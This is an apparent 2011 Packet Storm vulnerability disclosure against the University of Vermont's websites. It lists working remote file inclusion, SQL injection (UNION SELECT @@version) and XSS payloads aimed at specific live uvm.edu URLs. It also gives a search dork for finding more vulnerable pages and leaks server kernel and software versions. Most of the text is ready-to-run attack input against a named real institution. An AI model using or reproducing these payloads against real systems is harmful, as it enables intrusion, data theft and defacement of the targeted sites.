University Of Vermont XSS / RFI / SQL Injection

2011-08-10T00:00:00
ID PACKETSTORM:104018
Type packetstorm
Reporter Codeine
Modified 2011-08-10T00:00:00

Description

                                        
                                            `##############################################################################################  
| Title : University Of Vermont Multiple Vulnerabilities(uvm.edu)  
| Author : Codeine  
| Email : f3codeine[at]yahoo[dot]com  
| Tiwtter: codeinesec  
| Date : 08/10/2011  
| Cat : PHP[RFI,SQLI,XSS]  
| URL : http://uvm.edu/  
##############################################################################################  
Uname: Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009i686  
Software: Apache/2.2.3 (Red Hat). PHP/5.3.3   
##############################################################################################  
  
The University Of Vermont suffers from multiple web application vulnerabilities such as  
Remote File Inclusion, Sql Injection, Cross Site Scripting(XSS).  
  
##############################################################################################  
[*]Remote File Inclusion-  
magicscript.php?Page=Calendar&intro=http://google.com/  
This script shows up in almost every directory of every subdomain of uvm.edu.  
http://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=http://google.com/  
http://www.uvm.edu/magicscript.php?Page=Calendar&intro=http://google.com/  
Dork: site:uvm.edu inurl:magicscript  
_________________________________________________________________________________________________  
[*]SqlInjection-  
http://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3--  
[*]Xss-  
http://vmc.snr.uvm.edu/vmc/research/searchresults.php (Post)  
Magic quoates are active, but easily bypassable with "String.fromCharCode"  
<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>  
The above is what I sent to post, which contains "CodeineXss"  
_________________________________________________________________________________________________   
[*]SqlInjection-  
http://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89--  
_________________________________________________________________________________________________  
[*]SqlInjection-  
http://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  
_________________________________________________________________________________________________  
Greetz Hidden Ninja  
`